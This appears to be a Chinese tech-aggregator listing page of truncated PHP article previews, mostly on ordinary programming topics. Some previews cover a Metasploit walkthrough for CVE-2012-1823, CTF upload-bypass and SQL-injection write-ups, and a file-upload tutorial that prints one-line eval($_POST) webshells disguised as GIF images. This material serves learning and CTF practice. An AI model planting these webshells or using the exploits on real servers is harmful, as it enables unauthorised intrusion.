ICode9

精准搜索请尝试: 精确搜索
  • php:面向对象之成员变量(数组)2022-08-16 01:30:37

    php:面向对象之成员变量(数组)         一、PHP源码     1 <?php 2 3 class DATA{ 4 public $dlt_data = ""; 5 6 // set value of $dlt_data by ARRAY 7 function set_array_value($array_type) 8 { 9

  • PHP CGI漏洞利用2022-08-15 22:04:58

    PHP CGI漏洞利用 今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞 使用工具:攻击机kali linux、靶机metasploitable linux 具体步骤如下: 1.登入msfconsloe 2.搜索漏洞代号,输入 search cve:2012-1823 3.复制粘贴exploit/multi/htt

  • buuctf-web-[SUCTF 2019] CheckIn2022-08-14 16:02:39

    时间:August 9 2022 测试发现不可以上传以.ph开头的后缀名文件。于是想到上传.htaccess文件+上传图片马的方式执行webshell,结果并没有成功。 为啥失败了呢?原来题目环境用的是Nginx服务器而不是Apache。而.htaccess是Apache的配置文件。 查资料发现.user.ini文件也可以构成php后门。

  • 攻防世界 | Web-ics-052022-08-14 12:32:34

    题目描述 其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开题目 先进来随便点点看看有什么功能   除了“设备维护中心”,其他都没反应,对应了题目,那么应该在这里做文章了 路径是这个:http://61.147.171.105:50657/index.php 御剑扫了一下后台没扫出来什么有利用价

  • 攻防世界 | Web-Fakebook2022-08-14 12:30:34

    这关一进来一个登录框,一个注册框,题目没给什么提示 先注册一个试试(但是注册完之后退不回去了 需要重新开一个浏览器) 注册完随便点一点,发现URL有点异样 http://111.200.241.244:54356/view.php?no=1 看起来又是个SQL注入 先加个单引号——果然报错了 接着用order by 测试出来有四

  • 帝国CMS:后台登录后,跳转"您还未登录"错误提示解决方法2022-08-12 19:34:02

    登录帝国CMS,正确输入账户密码后,还会跳出提示“您还未登录”; 问题分析,登录相关的缓存写入权限不够导致的登录回跳。    解决方法: 1.修改  /e/data/adminlogin 文件夹下,index.php的权限,一般是因为权限为644,改为755及以上就可。 2.修改 /e/config/config.php文件内,$ecms_config['

  • PHP 安全漏洞:会话劫持、跨站点脚本、SQL 注入以及如何修复它们2022-08-11 23:30:13

    PHP 中的安全性在编写 PHP 代码时,牢记以下安全漏洞非常重要,以避免编写不安全的代码。 漏洞类型这些是您在编写 PHP 代码时会遇到的常见漏洞。我们将在下面更深入地讨论一些。 Cross Site Request Forgery由于程序员没有检查请求从哪里发送而导致的应用程序中的一个漏洞——这种攻

  • php 视频压缩ffmpeg2022-08-11 19:00:09

    $save_dir = storage_path('app') . '/public/' . mt_rand(99, 999) . time() . '_video' . ".mp4"; //保存原视频 $out_dir = storage_path('app') . '/public/' . mt_rand(99, 999) . time() . '_sma

  • 本地laravel+composer配置2022-08-11 16:30:31

    composer安装和laravel本地环境配置(十分钟左右)1.安装composer(1)需要安装php(以phpstudy集成开发环境为例) 桌面找到phpstudey 图标,鼠标右击 ->选择 ‘文件所在的位置’-> 按下back(<----)键 即(F12下面的键)-> 打开Extensions文件夹->选择php文件夹->选择一个php版本点开文件夹

  • php (nginx,apache) 常用配置2022-08-11 14:03:13

    前台html服务器,测试的时候不加缓存 server { listen 82; root D:/phpStudy/WWW/xxx; index index.html index.htm; location ~ .*\.(css|js|swf|htm|html)$ { add_header Cache-Control no-store; } } php项目 laravel , thinkphp , Ci 都用这个 server { listen

  • 文件上传2022-08-11 11:35:07

    文件上传概要 变形的一句话木马 GIF89a#define width 1337 #define height 1337#只支持php5<script language="php">@eval($_POST[cmd]);phpinfo();</script> php7适用GIF89a#define width 1337 #define height 1337<?=@eval($_POST[CMD]); 制作图片马的方法准备一个一句话木马1.p

  • Windows安装composer2022-08-10 15:35:24

    首先下载composer安装包,地址   https://getcomposer.org/Composer-Setup.exe   然后下一步,这里选择你的PHP版本,就是PHP所安装的位置   然后一直下一步,直到看到下图这样的就可以了  

  • PhpStorm 2022.2 最新变化有哪些,附PhpStorm中文版下载(mac/win)2022-08-08 18:02:03

    PhpStorm2022更新了,最新PhpStorm 2022.2版本应该了新的变化。PhpStorm 2022.2 是一项重大更新,具有 Mockery 和 Rector 支持、增强的泛型和枚举支持、调试器和 HTTP 客户端改进等。 PhpStorm mac中文版下载https://www.macw.com/mac/3789.html?id=ODA2NCZfJjI3LjE4Ni4xMjQuNA%3D%3D

  • 【PHP库】phpseclib - sftp远程文件操作2022-08-07 23:01:38

    需求场景说明 对接的三方商家需要进行文件传输,并且对方提供的方式是 sftp 的服务器账号,我们需根据他们提供的目录进行下载和上传指定文件。 安装 composer require phpseclib/phpseclib:~3.0 使用sftp功能 1.新建并设置config/sftp.php文件 return [ 'sftp' => [ 'h

  • 2022笔记PHP特性、内核、架构浅析说明2022-08-06 21:03:28

    PHP8的特性? 1、jit即时编译器。jit在opcache优化之后的基础上,结合runtime的信息再次优化,直接生成机器码。jit不是opcache优化的代替,是增强。 2、match表达式,用于变量的值转换与赋值。 3、联合类型。 支持声明并接受多个不同类型的,它是两种或多钟类型的集合。 4、static返回类型。

  • PHP文件目录操作2022-08-06 20:30:41

    文件目录操作 创建&关闭&删除 # 将文件读入一个字符串 file_get_contents() # 向文件中写入数据 fwrite()、file_put_contents() # 创建目录 mkdir() # 删除 unlink() # 删除目录 rmdir() 查&改 # 打开和关闭文件 fopen()、fclose() # 创建临时文件 tmpfile(),关闭临时文件fclose(

  • PHP字符串操作2022-08-06 19:17:23

    字符串操作 字符串查找 # 查找首次出现的位置,不区分大小写 stripos(string, needle [, offset]) echo stripos("xyC", "c"); //2 # 查找首次出现的位置,区分大小写 strpos(string, needle [, offset]) echo strpos("ABCabc", "c"); //5 # 查找最后一次出现的位置,不区分大小写 strr

  • Docker PHP如何启用MySQL扩展2022-08-06 18:11:24

    近段时间手头有个PHP的源码,对它挺感兴趣所以就用Docker运行了PHP8的容器,代码运行起来之后发现数据库无法访问,根据报错信息看出是MySQL的扩展没启用,百度溜达了好久也没找到一个帖子讲明白如何启用扩展,自己摸索了半天终于搞明白,在这里分享给一下 安装扩展的教程在文档中有记录,根据文

  • php:对象的数组(2)2022-08-06 17:01:21

    php:对象的数组(2)         一、php源码     <?php class NUM { public $number=""; public $number_class=""; } class obj { public $v1 = ""; public $v2 = ""; } for($i=0; $i<10; $i++) { $cat[$i] = new

  • 二次开发入门须知2022-08-05 11:01:25

    什么是二次开发 二次开发,简称二开,就是在现有的CMS框架上进行开发和修改、功能的扩展,然后达到自己想要的功能,一般来说都不会改变原有系统的内核。   为什么要二次开发? 现有功能无法满足你的需求时,需要自己写一些代码来实现功能。     二次开发的开发人员需要具备的基本条件 1.

  • PHP74 Remi软件源安装向导2022-08-05 10:33:55

    PHP74 Remi软件源安装向导 Remi's RPM repository 官网 http://rpms.remirepo.net/ 国内清华镜像 https://mirrors.tuna.tsinghua.edu.cn/remi/ 仓库设置和php安装向导 https://rpms.remirepo.net/wizard/ 向导系统设置 设置方法 RHEL 7 provides PHP version 5.4

  • 21-物联网开发终端管理篇-安装PHP,测试GET,POST接口(.Windows系统)2022-08-05 02:01:23

    <p><iframe name="ifd" src="https://mnifdv.cn/resource/cnblogs/iot_terminal_management" frameborder="0" scrolling="auto" width="100%" height="1500"></iframe></p>   安装VS运行库

  • 21-物联网开发终端管理篇-安装PHP,测试GET,POST接口(linux系统,宝塔)2022-08-05 02:00:12

    <p><iframe name="ifd" src="https://mnifdv.cn/resource/cnblogs/iot_terminal_management" frameborder="0" scrolling="auto" width="100%" height="1500"></iframe></p>   说明 宝塔安装

  • php中使用fsockopen实现异步请求2022-08-04 08:31:33

    转自:  https://www.yisu.com/zixun/367919.html   php中怎么使用fsockopen实现异步请求,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。 php执行一段程序,有可能几毫秒就执行完毕,也有可能耗时较长。 例如,用户下单

  • WordPress-Plugin-Boilerplate-Tutorial 更为简洁的架构方案2022-08-03 13:34:39

    官网: https://wppb.me/Github: https://github.com/DevinVinson/WordPress-Plugin-Boilerplate   Folder Subfolder / File Description 1. root algo-trade.php  加载插件 2. /includes class-algo-trade.php  load_dependencies() 注册实体列表   class-algo-trad

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有